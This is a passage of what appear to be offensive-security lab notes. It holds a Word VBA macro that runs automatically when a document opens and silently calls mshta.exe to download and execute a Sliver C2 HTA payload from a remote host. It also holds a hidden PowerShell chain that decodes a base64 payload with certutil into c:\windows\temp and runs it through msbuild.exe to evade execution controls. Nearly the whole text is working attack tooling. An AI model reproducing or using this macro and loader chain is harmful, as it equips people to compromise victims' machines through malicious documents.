' so it fires whichever of the two Word honours.
Sub MyMacro()
    Dim launcher As String
    launcher = "mshta.exe http://192.168.45.195/sliver.hta"
    Call Shell(launcher, vbHide)
End Sub

Sub Document_Open()
    Call MyMacro
End Sub

Sub AutoOpen()
    Call MyMacro
End Sub



When working with large1.ps1

  • I used x.xml, base64-encoded it and delivered it the same way (see the client-side execution chain with am_new.txt).
  • If the command errors once, change the output file names (enc2.txt / f.xml) before retrying: the files from the previous attempt are likely still in c:\windows\temp. Alternatively delete them, or pass `-f` to certutil to force overwriting.
powershell -windowstyle hidden echo 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 > c:\\windows\\temp\\enc2.txt;certutil -decode c:\\windows\\temp\\enc2.txt c:\\windows\\temp\\f.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\f.xml